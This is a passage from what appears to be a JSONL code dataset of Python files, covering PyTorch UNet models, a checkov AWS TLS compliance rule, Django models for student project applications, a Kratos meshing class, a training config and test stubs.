Implement\n\n # 7.8 Print out the library's books\n\n pass # Implement\n\n# END CODING HERE - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nif __name__ == '__main__':\n main()\n"} {"ext": "py", "sha": "1a30a83ced3787d7f087096cf104b361b32f2463", "content": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as f\nfrom torch.nn import init\nfrom .submodules import ConvLayer, UpsampleConvLayer, TransposedConvLayer, RecurrentConvLayer, ResidualBlock, ConvLSTM, ConvGRU, RecurrentResidualLayer\n\n\ndef skip_concat(x1, x2):\n return torch.cat([x1, x2], dim=1)\n\n\ndef skip_sum(x1, x2):\n return x1 + x2\n\n\nclass BaseUNet(nn.Module):\n def __init__(self, num_input_channels, num_output_channels=1, skip_type='sum', activation='sigmoid',\n num_encoders=4, base_num_channels=32, num_residual_blocks=2, norm=None, use_upsample_conv=True):\n super(BaseUNet, self).__init__()\n\n self.num_input_channels = num_input_channels\n self.num_output_channels = num_output_channels\n self.skip_type = skip_type\n self.apply_skip_connection = skip_sum if self.skip_type == 'sum' else skip_concat\n self.activation = activation\n self.norm = norm\n\n if use_upsample_conv:\n print('Using UpsampleConvLayer (slow, but no checkerboard artefacts)')\n self.UpsampleLayer = UpsampleConvLayer\n else:\n print('Using TransposedConvLayer (fast, with checkerboard artefacts)')\n self.UpsampleLayer = TransposedConvLayer\n\n self.num_encoders = num_encoders\n self.base_num_channels = base_num_channels\n self.num_residual_blocks = num_residual_blocks\n self.max_num_channels = self.base_num_channels * pow(2, self.num_encoders)\n\n assert(self.num_input_channels > 0)\n assert(self.num_output_channels > 0)\n\n self.encoder_input_sizes = []\n for i in range(self.num_encoders):\n self.encoder_input_sizes.append(self.base_num_channels * pow(2, i))\n\n self.encoder_output_sizes = [self.base_num_channels * pow(2, i + 1) for i in range(self.num_encoders)]\n\n self.activation = getattr(torch, self.activation, 'sigmoid')\n\n def build_resblocks(self):\n self.resblocks = nn.ModuleList()\n for i in range(self.num_residual_blocks):\n self.resblocks.append(ResidualBlock(self.max_num_channels, self.max_num_channels, norm=self.norm))\n\n def build_decoders(self):\n decoder_input_sizes = list(reversed([self.base_num_channels * pow(2, i + 1) for i in range(self.num_encoders)]))\n\n self.decoders = nn.ModuleList()\n for input_size in decoder_input_sizes:\n self.decoders.append(self.UpsampleLayer(input_size if self.skip_type == 'sum' else 2 * input_size,\n input_size // 2,\n kernel_size=5, padding=2, norm=self.norm))\n\n def build_prediction_layer(self):\n self.pred = ConvLayer(self.base_num_channels if self.skip_type == 'sum' else 2 * self.base_num_channels,\n self.num_output_channels, 1, activation=None, norm=self.norm)\n\n\nclass UNet(BaseUNet):\n def __init__(self, num_input_channels, num_output_channels=1, skip_type='sum', activation='sigmoid',\n num_encoders=4, base_num_channels=32, num_residual_blocks=2, norm=None, use_upsample_conv=True):\n super(UNet, self).__init__(num_input_channels, num_output_channels, skip_type, activation,\n num_encoders, base_num_channels, num_residual_blocks, norm, use_upsample_conv)\n\n self.head = ConvLayer(self.num_input_channels, self.base_num_channels,\n kernel_size=5, stride=1, padding=2) # N x C x H x W -> N x 32 x H x W\n\n self.encoders = nn.ModuleList()\n for input_size, output_size in zip(self.encoder_input_sizes, self.encoder_output_sizes):\n self.encoders.append(ConvLayer(input_size, output_size, kernel_size=5,\n stride=2, padding=2, norm=self.norm))\n\n self.build_resblocks()\n self.build_decoders()\n self.build_prediction_layer()\n\n def forward(self, x):\n \"\"\"\n :param x: N x num_input_channels x H x W\n :return: N x num_output_channels x H x W\n \"\"\"\n\n # head\n x = self.head(x)\n head = x\n\n # encoder\n blocks = []\n for i, encoder in enumerate(self.encoders):\n x = encoder(x)\n blocks.append(x)\n\n # residual blocks\n for resblock in self.resblocks:\n x = resblock(x)\n\n # decoder\n for i, decoder in enumerate(self.decoders):\n x = decoder(self.apply_skip_connection(x, blocks[self.num_encoders - i - 1]))\n\n img = self.activation(self.pred(self.apply_skip_connection(x, head)))\n\n return img\n\n\nclass UNetRecurrent(BaseUNet):\n \"\"\"\n Recurrent UNet architecture where every encoder is followed by a recurrent convolutional block,\n such as a ConvLSTM or a ConvGRU.\n Symmetric, skip connections on every encoding layer.\n \"\"\"\n\n def __init__(self, num_input_channels, num_output_channels=1, skip_type='sum',\n recurrent_block_type='convlstm', activation='sigmoid', num_encoders=4, base_num_channels=32,\n num_residual_blocks=2, norm=None, use_upsample_conv=True):\n super(UNetRecurrent, self).__init__(num_input_channels, num_output_channels, skip_type, activation,\n num_encoders, base_num_channels, num_residual_blocks, norm,\n use_upsample_conv)\n\n self.head = ConvLayer(self.num_input_channels, self.base_num_channels,\n kernel_size=5, stride=1, padding=2) # N x C x H x W -> N x 32 x H x W\n\n self.encoders = nn.ModuleList()\n for input_size, output_size in zip(self.encoder_input_sizes, self.encoder_output_sizes):\n self.encoders.append(RecurrentConvLayer(input_size, output_size,\n kernel_size=5, stride=2, padding=2,\n recurrent_block_type=recurrent_block_type,\n norm=self.norm))\n\n self.build_resblocks()\n self.build_decoders()\n self.build_prediction_layer()\n\n def forward(self, x, prev_states):\n \"\"\"\n :param x: N x num_input_channels x H x W\n :param prev_states: previous LSTM states for every encoder layer\n :return: N x num_output_channels x H x W\n \"\"\"\n\n # head\n x = self.head(x)\n head = x\n\n if prev_states is None:\n prev_states = [None] * self.num_encoders\n\n # encoder\n blocks = []\n states = []\n for i, encoder in enumerate(self.encoders):\n x, state = encoder(x, prev_states[i])\n blocks.append(x)\n states.append(state)\n\n # residual blocks\n for resblock in self.resblocks:\n x = resblock(x)\n\n # decoder\n for i, decoder in enumerate(self.decoders):\n x = decoder(self.apply_skip_connection(x, blocks[self.num_encoders - i - 1]))\n\n # tail\n img = self.activation(self.pred(self.apply_skip_connection(x, head)))\n\n return img, states\n\n\nclass UNetFire(BaseUNet):\n \"\"\"\n \"\"\"\n\n def __init__(self, num_input_channels, num_output_channels=1, skip_type='sum',\n recurrent_block_type='convgru', base_num_channels=16,\n num_residual_blocks=2, norm=None, kernel_size=3,\n recurrent_blocks={'resblock': [0]}):\n super(UNetFire, self).__init__(num_input_channels=num_input_channels,\n num_output_channels=num_output_channels,\n skip_type=skip_type,\n base_num_channels=base_num_channels,\n num_residual_blocks=num_residual_blocks,\n norm=norm)\n self.kernel_size = kernel_size\n self.recurrent_blocks = recurrent_blocks\n print(self.num_input_channels)\n self.head = RecurrentConvLayer(self.num_input_channels,\n self.base_num_channels,\n kernel_size=self.kernel_size,\n padding=self.kernel_size // 2,\n recurrent_block_type=recurrent_block_type,\n norm=self.norm)\n self.num_recurrent_units = 1\n self.resblocks = nn.ModuleList()\n recurrent_indices = self.recurrent_blocks.get('resblock', [])\n for i in range(self.num_residual_blocks):\n if i in recurrent_indices or -1 in recurrent_indices:\n self.resblocks.append(RecurrentResidualLayer(\n in_channels=self.base_num_channels,\n out_channels=self.base_num_channels,\n recurrent_block_type=recurrent_block_type,\n norm=self.norm))\n self.num_recurrent_units += 1\n else:\n self.resblocks.append(ResidualBlock(self.base_num_channels,\n self.base_num_channels,\n norm=self.norm))\n\n self.pred = ConvLayer(2 * self.base_num_channels if self.skip_type == 'concat' else self.base_num_channels,\n self.num_output_channels, kernel_size=1, padding=0, activation=None, norm=None)\n\n def forward(self, x, prev_states):\n \"\"\"\n :param x: N x num_input_channels x H x W\n :param prev_states: previous LSTM states for every encoder layer\n :return: N x num_output_channels x H x W\n \"\"\"\n\n if prev_states is None:\n prev_states = [None] * (self.num_recurrent_units)\n\n states = []\n state_idx = 0\n\n # head\n x, state = self.head(x, prev_states[state_idx])\n state_idx += 1\n states.append(state)\n\n # residual blocks\n recurrent_indices = self.recurrent_blocks.get('resblock', [])\n for i, resblock in enumerate(self.resblocks):\n if i in recurrent_indices or -1 in recurrent_indices:\n x, state = resblock(x, prev_states[state_idx])\n state_idx += 1\n states.append(state)\n else:\n x = resblock(x)\n\n # tail\n img = self.pred(x)\n return img, states\n"} {"ext": "py", "sha": "1a30a95b720fecbddf3339b56bb201d9cdb0ad1d", "content": "from unittest import mock\nimport unittest\n\nimport pytest\n\nfrom .main import some_func\n\n\nclass TestMain(unittest.TestCase):\n @pytest.fixture(autouse=True)\n def _setup_service(self):\n self.mock_object = mock.MagicMock()\n\n def test_some_func(self):\n assert some_func() == 3\n\n # def test_mock(self):\n # assert self.mock_object.some_method.called"} {"ext": "py", "sha": "1a30a984b5512edaf0b19be6d24d7db8b82d915e", "content": "from checkov.common.models.enums import CheckResult, CheckCategories\nfrom checkov.cloudformation.checks.resource.base_resource_check import BaseResourceCheck\nfrom checkov.common.util.type_forcers import force_list\n\nclass ALBListenerTLS12(BaseResourceCheck):\n\n def __init__(self):\n name = \"Ensure that Application Load Balancer Listener is using TLS v1.2\"\n id = \"CKV_AWS_103\"\n supported_resources = ['AWS::ElasticLoadBalancingV2::Listener']\n categories = [CheckCategories.GENERAL_SECURITY]\n super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)\n\n def scan_resource_conf(self, conf):\n \"\"\"\n validates that ALB Listener is using TLS v1.2\n https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-elasticloadbalancingv2-listener.html\n :param conf: aws_alb_listener configuration\n :return: <CheckResult>\n \"\"\"\n\n if 'Properties' in conf.keys():\n if 'Protocol' in conf['Properties'].keys():\n # Check SslPolicy only if protocol is HTTPS or TLS.\n # Other protocols are not intresting within the context of this check.\n if conf['Properties']['Protocol'] in ('HTTPS', 'TLS'):\n if 'SslPolicy' in conf['Properties'].keys():\n if conf['Properties']['SslPolicy'].startswith((\"ELBSecurityPolicy-FS-1-2\", \"ELBSecurityPolicy-TLS-1-2\")):\n return CheckResult.PASSED\n return CheckResult.FAILED\n elif conf['Properties']['Protocol'] in ('TCP', 'UDP', 'TCP_UDP'):\n return CheckResult.PASSED\n for idx_action, action in enumerate(conf['Properties']['DefaultActions']):\n redirects = action.get(\"RedirectConfig\", [])\n for idx_redirect, redirect in enumerate(force_list(redirects)):\n if redirect.get(\"Protocol\", []) == 'HTTPS':\n return CheckResult.PASSED\n return CheckResult.FAILED\n\ncheck = ALBListenerTLS12()\n"} {"ext": "py", "sha": "1a30a9dce230d2774ae90b0737f8f7c6d3c5a488", "content": "# Bep Marketplace ELE\n# Copyright (c) 2016-2021 Kolibri Solutions\n# License: See LICENSE file or https://github.com/KolibriSolutions/BepMarketplace/blob/master/LICENSE\n#\nfrom django.contrib.auth.models import User\nfrom django.core.validators import MinValueValidator, MaxValueValidator\nfrom django.db import models\n\nfrom proposals.models import Proposal\nfrom timeline.models import TimeSlot\nfrom django.conf import settings\n\n\nclass Application(models.Model):\n \"\"\"\n A student's application to a proposal.\n \"\"\"\n Priority = models.IntegerField(validators=[MinValueValidator(1), MaxValueValidator(settings.MAX_NUM_APPLICATIONS)])\n Proposal = models.ForeignKey(Proposal, on_delete=models.CASCADE, related_name='applications')\n Student = models.ForeignKey(User, on_delete=models.CASCADE, related_name='applications')\n Timestamp = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.Student.get_username() + \" to \" + self.Proposal.__str__()\n\n class Meta:\n ordering = [\"Priority\"]\n\n\nclass Distribution(models.Model):\n \"\"\"A student distributed to a proposal.x\"\"\"\n Proposal = models.ForeignKey(Proposal, on_delete=models.PROTECT, related_name='distributions')\n Student = models.ForeignKey(User, on_delete=models.CASCADE, related_name='distributions')\n TimeSlot = models.ForeignKey(TimeSlot, on_delete=models.PROTECT, related_name='distributions')\n Application = models.OneToOneField(Application, on_delete=models.SET_NULL, blank=True, null=True, related_name='distributions')\n\n def TotalGrade(self):\n \"\"\"\n Return total grade of student as not-rounded float\n :return:\n \"\"\"\n return sum([r.Grade * r.Category.Weight for r in self.results.all()]) / 100\n\n def TotalGradeRounded(self):\n \"\"\"\n Grade rounded to half points.\n :return:\n \"\"\"\n return round(self.TotalGrade() * 2, 0) / 2\n\n def missing_files(self):\n return self.TimeSlot.filetypes.exclude(pk__in=self.files.values_list('Type', flat=True))\n\n def missing_file_gradings(self):\n return self.files.filter(Type__CheckedBySupervisor=True).filter(staffresponse__isnull=True)\n\n def __str__(self):\n return self.Proposal.Title + \" to \" + self.Student.usermeta.get_nice_name() + \" (\" + self.Student.username + \")\"\n"} {"ext": "py", "sha": "1a30aa083d198cb9c5063d31c28413347e892d55", "content": "\"\"\" Tuple as Data Structure\nWe have see how we interpreted tuples as data structures\n\nThe position of the object contained in the tuple gives it meaning\n\nFor example, we can represent a 2D coordinate as: (10, 20)\n x y\n\nIf pt is a position tuple, we can retrieve the x and x, y = pt or x = pt[0]\ny coordinates using: y = py[1]\n\nFor example, to calculate the distance of pt from the origin we could write:\n\ndist = math.sgrt(pt[0] ** 2 + pt[1] ** 2)\n\nNow this is not very readable, and if someone sees this code they will have ti know thatpt[0] mans the x-coordinate and pt[1] means the y-coordinate.\n\nThis is not very transparent.\n\n\n\n # Using a class instead.\nAt this point, in order to make things clearer for the reader (not the complier, the reader), we might want to approach this using a class method instead.\n\n\"\"\"\nclass Point2D:\n def __init__(self, x, y):\n self.x = x\n\n"} {"ext": "py", "sha": "1a30aa097302de5cf83fb268314f20d004914197", "content": "#!/usr/bin/python3\n\nimport os\nimport sys\nimport math\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nimport data_utils\n\nload_fn = data_utils.load_cls_train_val\nbalance_fn = None\nmap_fn = None\nkeep_remainder = True\nsave_ply_fn = None\n\nnum_class = 40\n\n\nbatch_size = 32\nsample_num = 512\nnum_epochs = 4096\nstep_val = 500\n\n\nlearning_rate_base = 0.01\ndecay_steps = 8000\ndecay_rate = 0.5\nlearning_rate_min = 1e-6\n\nweight_decay = 1e-5\n\njitter = 0.0\njitter_val = 0.0\njitter_test = 0.0\n\nrotation_range = [0, 0, 0, 'u']\nrotation_range_val = [0, 0, 0, 'u']\nrotation_range_test = [0, 0, 0, 'u']\nrotation_order = 'rxyz'\n\nscaling_range = [0, 0, 0, 'g']\nscaling_range_val = [0, 0, 0, 'u']\nscaling_range_test = [0, 0, 0, 'u']\n\nsample_num_variance = 1 // 8\nsample_num_clip = 1 // 4\n\nx = 3\n\nxconv_param_name = ('K', 'D', 'P', 'C', 'links')\nxconv_params = [dict(zip(xconv_param_name, xconv_param)) for xconv_param in\n [(8, 1, -1, 16 * x, []),\n (12, 2, 384, 32 * x, []),\n (16, 2, 128, 64 * x, []),\n (16, 3, 128, 128 * x, [])]]\n\nwith_global = True\n\nfc_param_name = ('C', 'dropout_rate')\nfc_params = [dict(zip(fc_param_name, fc_param)) for fc_param in\n [(128 * x, 0.0),\n (64 * x, 0.8)]]\n\nsampling = 'random'\n\noptimizer = 'adam'\nepsilon = 1e-2\n\ndata_dim = 6\nuse_extra_features = False\nwith_X_transformation = True\nsorting_method = None\n"} {"ext": "py", "sha": "1a30aa1ebea62c018798b3abbc11c2bd27fa3f50", "content": "from __future__ import print_function, absolute_import, division # makes KratosMultiphysics backward compatible with python 2.6 and 2.7\n#import kratos core and applications\nimport KratosMultiphysics\nimport KratosMultiphysics.DelaunayMeshingApplication as KratosDelaunay\nimport KratosMultiphysics.PfemFluidDynamicsApplication as KratosPfemFluid\nfrom importlib import import_module\n\n\ndef CreateMeshingDomain(main_model_part, custom_settings):\n return FluidMeshingDomain(main_model_part, custom_settings)\n\nclass FluidMeshingDomain(object):\n\n ##constructor. the constructor shall only take care of storing the settings\n ##and the pointer to the main_model part.\n ##\n ##real construction shall be delayed to the function \"Initialize\" which\n ##will be called once the mesher is already filled\n def __init__(self, main_model_part, custom_settings):\n\n self.echo_level = 1\n self.main_model_part = main_model_part\n\n ##settings string in json format\n default_settings = KratosMultiphysics.Parameters(\"\"\"\n {\n\t \"python_module\": \"meshing_domain\",\n \"model_part_name\": \"model_part_name\",\n \"alpha_shape\": 2.4,\n \"offset_factor\": 0.0,\n \"meshing_strategy\":{\n \"python_module\": \"meshing_strategy\",\n \"meshing_frequency\": 0.0,\n \"remesh\": false,\n \"refine\": false,\n \"reconnect\": false,\n \"transfer\": false,\n \"constrained\": false,\n \"mesh_smoothing\": false,\n \"variables_smoothing\": false,\n \"elemental_variables_to_smooth\":[],\n \"reference_element_type\": \"Element2D3N\",\n \"reference_condition_type\": \"CompositeCondition2D2N\"\n },\n \"spatial_bounding_box\":{\n \"use_bounding_box\" : true,\n \"initial_time\" : 0.0,\n \"final_time\" : 1000.0,\n \"upper_point\" : [10,10,10],\n \"lower_point\" : [-10,-10,-10]\n },\n \"spatial_refining_box\" : {\n \"use_refining_box\" : false,\n \"mesh_size\" : 0.1,\n \"initial_time\" : 0.0,\n \"final_time\" : 1,\n \"upper_point\" : [10,10,10],\n \"lower_point\" : [-10,-10,-10]\n },\n \"refining_parameters\":{\n \"critical_size\": 0.0,\n \"threshold_variable\": \"PLASTIC_STRAIN\",\n \"reference_threshold\" : 0.0,\n \"error_variable\": \"NORM_ISOCHORIC_STRESS\",\n \"reference_error\" : 0.0,\n \"add_nodes\": true,\n \"insert_nodes\": false,\n \"remove_nodes\": {\n \"apply_removal\": false,\n \"on_distance\": false,\n \"on_threshold\": false,\n \"on_error\": false\n },\n \"remove_boundary\": {\n \"apply_removal\": false,\n \"on_distance\": false,\n \"on_threshold\": false,\n \"on_error\": false\n },\n \"refine_elements\": {\n \"apply_refinement\": false,\n \"on_distance\": false,\n \"on_threshold\": false,\n \"on_error\": false\n },\n \"refine_boundary\": {\n \"apply_refinement\": false,\n \"on_distance\": false,\n \"on_threshold\": false,\n \"on_error\": false\n }\n },\n \"elemental_variables_to_transfer\":[]\n }\n \"\"\")\n\n ##overwrite the default settings with user-provided parameters\n self.settings = custom_settings\n self.settings.ValidateAndAssignDefaults(default_settings)\n\n #construct the meshing strategy\n python_module_name = \"KratosMultiphysics.PfemFluidDynamicsApplication\"\n full_module_name = python_module_name + \".\" + self.settings[\"meshing_strategy\"][\"python_module\"].GetString()\n meshing_module = import_module(full_module_name)\n #meshing_module = __import__(self.settings[\"meshing_strategy\"][\"python_module\"].GetString())\n self.MeshingStrategy = meshing_module.CreateMeshingStrategy(self.main_model_part, self.settings[\"meshing_strategy\"])\n\n self.active_remeshing = False\n if( self.settings[\"meshing_strategy\"][\"remesh\"].GetBool() or self.settings[\"meshing_strategy\"][\"transfer\"].GetBool() ):\n self.active_remeshing = True\n\n print(\"::[Meshing_Domain]:: (\",self.settings[\"model_part_name\"].GetString(),\" ) -BUILT-\")\n\n\n ####\n\n def Initialize(self):\n\n print(\"::[Meshing Domain]:: -START-\")\n\n self.dimension = self.main_model_part.ProcessInfo[KratosMultiphysics.SPACE_DIMENSION]\n\n # Set MeshingParameters\n self.SetMeshingParameters()\n\n # Meshing Stratety\n self.MeshingStrategy.SetEchoLevel(self.echo_level)\n self.MeshingStrategy.Initialize(self.MeshingParameters, self.dimension)\n\n print(\"::[Meshing Domain]:: -END- \")\n\n ####\n\n #\n def SetInfoParameters(self):\n\n # Create InfoParameters\n self.InfoParameters = KratosDelaunay.MeshingInfoParameters()\n self.InfoParameters.Initialize()\n\n #\n def SetTransferParameters(self):\n\n # Create TransferParameters\n self.TransferParameters = KratosDelaunay.TransferParameters()\n transfer_variables = self.settings[\"elemental_variables_to_transfer\"]\n #for variable in transfer_variables:\n # self.TransferParameters.SetVariable( KratosMultiphysics.KratosGlobals.GetVariable( variable.GetString() ) )\n for i in range(0, transfer_variables.size() ):\n self.TransferParameters.SetVariable(KratosMultiphysics.KratosGlobals.GetVariable(transfer_variables[i].GetString()))\n\n #\n def SetRefiningParameters(self):\n\n # Create RefiningParameters\n self.RefiningParameters = KratosDelaunay.RefiningParameters()\n self.RefiningParameters.Initialize()\n\n # parameters\n self.RefiningParameters.SetAlphaParameter(self.settings[\"alpha_shape\"].GetDouble())\n\n # set mesh refinement in box\n size = self.dimension\n refining_box = self.settings[\"spatial_refining_box\"]\n if(refining_box[\"use_refining_box\"].GetBool()):\n self.MeshingParameters.SetUseRefiningBox(True) \n self.MeshingParameters.SetRefiningBoxMinimumPoint(refining_box[\"lower_point\"][0].GetDouble(),refining_box[\"lower_point\"][1].GetDouble(),refining_box[\"lower_point\"][2].GetDouble()) \n self.MeshingParameters.SetRefiningBoxMaximumPoint(refining_box[\"upper_point\"][0].GetDouble(),refining_box[\"upper_point\"][1].GetDouble(),refining_box[\"upper_point\"][2].GetDouble()) \n self.MeshingParameters.SetRefiningBoxTimeInterval(refining_box[\"initial_time\"].GetDouble(),refining_box[\"final_time\"].GetDouble())\n self.MeshingParameters.SetRefiningBoxMeshSize(refining_box[\"mesh_size\"].GetDouble())\n\n\n removing_options = KratosMultiphysics.Flags()\n\n #remove nodes\n remove_nodes = self.settings[\"refining_parameters\"][\"remove_nodes\"]\n removing_options.Set(KratosDelaunay.MesherUtilities.REMOVE_NODES, remove_nodes[\"apply_removal\"].GetBool())\n removing_options.Set(KratosDelaunay.MesherUtilities.REMOVE_NODES_ON_DISTANCE, remove_nodes[\"on_distance\"].GetBool())\n removing_options.Set(KratosDelaunay.MesherUtilities.REMOVE_NODES_ON_ERROR, remove_nodes[\"on_error\"].GetBool())\n removing_options.Set(KratosDelaunay.MesherUtilities.REMOVE_NODES_ON_THRESHOLD, remove_nodes[\"on_threshold\"].GetBool())\n\n #remove boundary\n remove_boundary = self.settings[\"refining_parameters\"][\"remove_boundary\"]\n removing_options.Set(KratosDelaunay.MesherUtilities.REMOVE_BOUNDARY_NODES, remove_boundary[\"apply_removal\"].GetBool())\n removing_options.Set(KratosDelaunay.MesherUtilities.REMOVE_BOUNDARY_NODES_ON_DISTANCE, remove_boundary[\"on_distance\"].GetBool())\n removing_options.Set(KratosDelaunay.MesherUtilities.REMOVE_BOUNDARY_NODES_ON_ERROR, remove_boundary[\"on_error\"].GetBool())\n removing_options.Set(KratosDelaunay.MesherUtilities.REMOVE_BOUNDARY_NODES_ON_THRESHOLD, remove_boundary[\"on_threshold\"].GetBool())\n\n refining_options = KratosMultiphysics.Flags()\n refining_options.Set(KratosDelaunay.MesherUtilities.REFINE, self.settings[\"meshing_strategy\"][\"refine\"].GetBool())\n refining_options.Set(KratosDelaunay.MesherUtilities.REFINE_ADD_NODES, self.settings[\"refining_parameters\"][\"add_nodes\"].GetBool())\n refining_options.Set(KratosDelaunay.MesherUtilities.REFINE_INSERT_NODES, self.settings[\"refining_parameters\"][\"insert_nodes\"].GetBool())\n\n #refine elements\n refine_elements = self.settings[\"refining_parameters\"][\"refine_elements\"]\n refining_options.Set(KratosDelaunay.MesherUtilities.REFINE_ELEMENTS, refine_elements[\"apply_refinement\"].GetBool())\n refining_options.Set(KratosDelaunay.MesherUtilities.REFINE_ELEMENTS_ON_DISTANCE, refine_elements[\"on_distance\"].GetBool())\n refining_options.Set(KratosDelaunay.MesherUtilities.REFINE_ELEMENTS_ON_ERROR, refine_elements[\"on_error\"].GetBool())\n refining_options.Set(KratosDelaunay.MesherUtilities.REFINE_ELEMENTS_ON_THRESHOLD, refine_elements[\"on_threshold\"].GetBool())\n\n #refine boundary\n refine_boundary = self.settings[\"refining_parameters\"][\"refine_boundary\"]\n refining_options.Set(KratosDelaunay.MesherUtilities.REFINE_BOUNDARY, refine_boundary[\"apply_refinement\"].GetBool())\n refining_options.Set(KratosDelaunay.MesherUtilities.REFINE_BOUNDARY_ON_DISTANCE, refine_boundary[\"on_distance\"].GetBool())\n refining_options.Set(KratosDelaunay.MesherUtilities.REFINE_BOUNDARY_ON_ERROR, refine_boundary[\"on_error\"].GetBool())\n refining_options.Set(KratosDelaunay.MesherUtilities.REFINE_BOUNDARY_ON_THRESHOLD, refine_boundary[\"on_threshold\"].GetBool())\n\n self.RefiningParameters.SetRefiningOptions(refining_options)\n self.RefiningParameters.SetRemovingOptions(removing_options)\n\n #\n def SetMeshingParameters(self):\n\n # Create MeshingParameters\n self.MeshingParameters = KratosDelaunay.MeshingParameters()\n self.MeshingParameters.Initialize()\n\n self.MeshingParameters.SetSubModelPartName(self.settings[\"model_part_name\"].GetString())\n\n\n\n if(self.active_remeshing):\n\n self.MeshingParameters.SetAlphaParameter(self.settings[\"alpha_shape\"].GetDouble())\n self.MeshingParameters.SetOffsetFactor(self.settings[\"offset_factor\"].GetDouble())\n\n self.SetInfoParameters()\n self.SetTransferParameters()\n self.SetRefiningParameters()\n\n self.MeshingParameters.SetInfoParameters(self.InfoParameters)\n self.MeshingParameters.SetTransferParameters(self.TransferParameters)\n self.MeshingParameters.SetRefiningParameters(self.RefiningParameters)\n\n\n bounding_box = self.settings[\"spatial_bounding_box\"]\n if(bounding_box[\"use_bounding_box\"].GetBool()):\n self.MeshingParameters.SetUseBoundingBox(True) \n self.MeshingParameters.SetBoundingBoxLowerPoint(bounding_box[\"lower_point\"][0].GetDouble(),bounding_box[\"lower_point\"][1].GetDouble(),bounding_box[\"lower_point\"][2].GetDouble()) \n self.MeshingParameters.SetBoundingBoxUpperPoint(bounding_box[\"upper_point\"][0].GetDouble(),bounding_box[\"upper_point\"][1].GetDouble(),bounding_box[\"upper_point\"][2].GetDouble()) \n self.MeshingParameters.SetBoundingBoxTimeInterval(bounding_box[\"initial_time\"].GetDouble(),bounding_box[\"final_time\"].GetDouble())\n\n #\n def ExecuteMeshing(self):\n\n if( self.active_remeshing ):\n self.MeshingStrategy.GenerateMesh()\n\n #\n def Check(self):\n\n # set mesher utilities\n self.mesher_utils = KratosDelaunay.MesherUtilities()\n\n # set the domain labels to mesh mesher\n critical_mesh_size = self.settings[\"refining_parameters\"][\"critical_size\"].GetDouble()\n\n critical_radius = self.mesher_utils.CheckCriticalRadius(self.main_model_part,critical_mesh_size)\n print(\" CriticalRadius \", critical_radius)\n\n #\n def Active(self):\n return self.active_remeshing\n\n #\n def SetEchoLevel(self, echo_level):\n self.echo_level = echo_level\n\n #\n def GetVariables(self):\n\n nodal_variables = []\n transfer_variables = self.settings[\"elemental_variables_to_transfer\"]\n for i in range(0, transfer_variables.size() ):\n nodal_variables.append(transfer_variables[i].GetString())\n\n return nodal_variables\n\n #\n def ComputeAverageMeshParameters(self):\n\n MesherUtils = KratosDelaunay.MesherUtilities();\n self.domain_volume = MesherUtils.ComputeModelPartVolume(self.main_model_part)\n self.element_mean_volume = 0\n\n number_of_elements = self.main_model_part.NumberOfElements()\n nodes_for_element = self.main_model_part.ProcessInfo[KratosMultiphysics.SPACE_DIMENSION] + 1\n\n if(number_of_elements != 0):\n self.element_mean_volume = self.domain_volume/float(number_of_elements*nodes_for_element)\n\n self.RefiningParameters.SetMeanVolume(self.element_mean_volume)\n\n #\n def GetMeanVolume(self):\n\n return self.element_mean_volume\n\n #\n def GetTotalVolume(self):\n\n return self.domain_volume\n\n #\n def ComputeInitialAverageMeshParameters(self):\n\n self.mesh_parameters = KratosPfemFluid.ComputeAveragePfemMeshParameters(self.main_model_part, self.MeshingParameters,self.echo_level)\n self.mesh_parameters.Execute()\n\n # numFluid=0\n # mean_nodal_h=0\n # for node in self.main_model_part.Nodes:\n # if (node.Is(KratosMultiphysics.FLUID)):\n # numFluid+=1\n # nodal_h=node.GetSolutionStepValue(KratosMultiphysics.NODAL_H)\n # mean_nodal_h+=nodal_h\n\n # mean_nodal_h*=1.0/numFluid;\n\n # self.RefiningParameters.SetCriticalRadius(mean_nodal_h)\n # self.RefiningParameters.SetInitialRadius(mean_nodal_h)\n\n # delta_time = self.main_model_part.ProcessInfo[KratosMultiphysics.DELTA_TIME]\n # self.main_model_part.ProcessInfo.SetValue(KratosPfemFluid.INITIAL_DELTA_TIME,delta_time)\n # self.main_model_part.ProcessInfo.SetValue(KratosPfemFluid.CURRENT_DELTA_TIME,delta_time)\n # self.main_model_part.ProcessInfo.SetValue(KratosMultiphysics.PREVIOUS_DELTA_TIME,delta_time)\n # self.main_model_part.ProcessInfo.SetValue(KratosPfemFluid.TIME_INTERVAL_CHANGED,False)\n\n def SetTimeDataOnProcessInfo(self):\n\n delta_time = self.main_model_part.ProcessInfo[KratosMultiphysics.DELTA_TIME]\n self.main_model_part.ProcessInfo.SetValue(KratosPfemFluid.INITIAL_DELTA_TIME,delta_time)\n self.main_model_part.ProcessInfo.SetValue(KratosPfemFluid.CURRENT_DELTA_TIME,delta_time)\n self.main_model_part.ProcessInfo.SetValue(KratosMultiphysics.PREVIOUS_DELTA_TIME,delta_time)\n self.main_model_part.ProcessInfo.SetValue(KratosPfemFluid.TIME_INTERVAL_CHANGED,False)\n\n\n #\n"} {"ext": "py", "sha": "1a30aa85db337f10ba47f82fb42a202e51c937b2", "content": "#\n# Licensed to the Apache Software Foundation (ASF) under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport sys\nimport unittest\n\nimport pandas as pd\n\nfrom apache_beam.dataframe import doctests\nfrom apache_beam.dataframe.frames import PD_VERSION\nfrom apache_beam.dataframe.pandas_top_level_functions import _is_top_level_function\n\n\n@unittest.skipIf(sys.platform == 'win32', '[BEAM-10626]')\nclass DoctestTest(unittest.TestCase):\n def test_ndframe_tests(self):\n # IO methods are tested in io_test.py\n skip_writes = {\n f'pandas.core.generic.NDFrame.{name}': ['*']\n for name in dir(pd.core.generic.NDFrame) if name.startswith('to_')\n }\n\n result = doctests.testmod(\n pd.core.generic,\n use_beam=False,\n report=True,\n wont_implement_ok={\n 'pandas.core.generic.NDFrame.head': ['*'],\n 'pandas.core.generic.NDFrame.shift': 